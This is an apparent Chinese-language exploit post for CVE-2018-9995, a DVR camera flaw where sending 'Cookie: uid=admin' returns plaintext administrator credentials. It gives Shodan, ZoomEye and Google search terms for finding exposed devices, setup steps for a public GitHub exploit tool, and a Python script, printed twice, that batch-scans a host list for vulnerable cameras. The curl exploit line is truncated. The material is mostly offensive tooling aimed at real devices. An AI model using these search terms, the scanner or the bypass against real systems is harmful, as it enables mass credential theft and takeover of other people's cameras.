###漏洞描述:
此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。
利用代码:
curl "http://
github已有公开的利用工具:
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
###关键词搜索:
1. zoomeye:
keyword: “/login.rsp"
2.shodan:
keyword:html:"/login.rsp"
keyword:"server:GNU rsp/1.0"
3.google:
keyword:intitle:"DVR login"
###poc利用
cd CVE-2018-9995_dvr_credentials
pip install -r requirements.txt
###批量验证
DVR系列摄像头批量检测 使用方法:python CVE-2018-9995_check.py host.txt
其中host.txt内容可以为8.8.8.8:8080或者 www.baidu.com ,脚本运行后对使用了DVR系列摄像头的host会保存到result.txt文件里
其中host.txt内容可以为8.8.8.8:8080或者 www.baidu.com ,脚本运行后对使用了DVR系列摄像头的host会保存到result.txt文件里
#author:hzkey
import tableprint as tp
import sys
import requests
import re
class Colors:
GREEN = '\033[32m'
RED = '\033[0;31m'
BLUE = '\033[*]'
ORANGE = '\033[33m'
def check_host(host):
try:
print(Colors.ORANGE+"Checking : %s"%host)
url = 'http://' + host+'/login.rsp'
rr= requests.get(url,timeout=30,allow_redirects=False)
if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):
print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)
ff=open('result.txt','a+')
ff.write('%s\n'%(url))
except:
pass
if __name__ == '__main__':
if len(sys.argv) < 2:
print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt
host.txt:127.0.0.1:8080 or baidu.com
""")
if len(sys.argv) >= 2:
file = open(sys.argv[1])
for i in file:
i = i.strip()
check_host(i)
file.close()
1
#author:hzkey
2
import tableprint as tp
3
import sys
4
import requests
5
import re
6
class Colors:
7
GREEN = '\033[32m'
8
RED = '\033[0;31m'
9
BLUE = '\033[*]'
10
ORANGE = '\033[33m'
11
def check_host(host):
12
try:
13
print(Colors.ORANGE+"Checking : %s"%host)
14
url = 'http://' + host+'/login.rsp'
15
rr= requests.get(url,timeout=30,allow_redirects=False)
16
if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):
17
print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url)
18
ff=open('result.txt','a+')
19
ff.write('%s\n'%(url))
20
except:
21
pass
22
if __name__ == '__main__':
23
if len(sys.argv) < 2:
24
print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt
25
host.txt:127.0.0.1:8080 or baidu.com
26
""")
27
if len(sys.argv) >= 2:
28
file = open(sys.argv[1])
29
for i in file:
30
i = i.strip()
31
check_host(i)
32
file.close()